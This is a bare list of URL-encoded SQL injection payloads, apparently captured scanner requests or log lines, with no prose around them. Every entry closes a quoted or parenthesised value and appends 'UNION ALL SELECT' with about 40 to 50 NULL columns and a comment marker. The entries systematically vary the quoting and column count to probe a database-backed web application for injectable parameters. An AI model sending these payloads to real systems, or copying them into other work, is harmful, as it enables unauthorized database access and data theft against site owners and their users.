1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 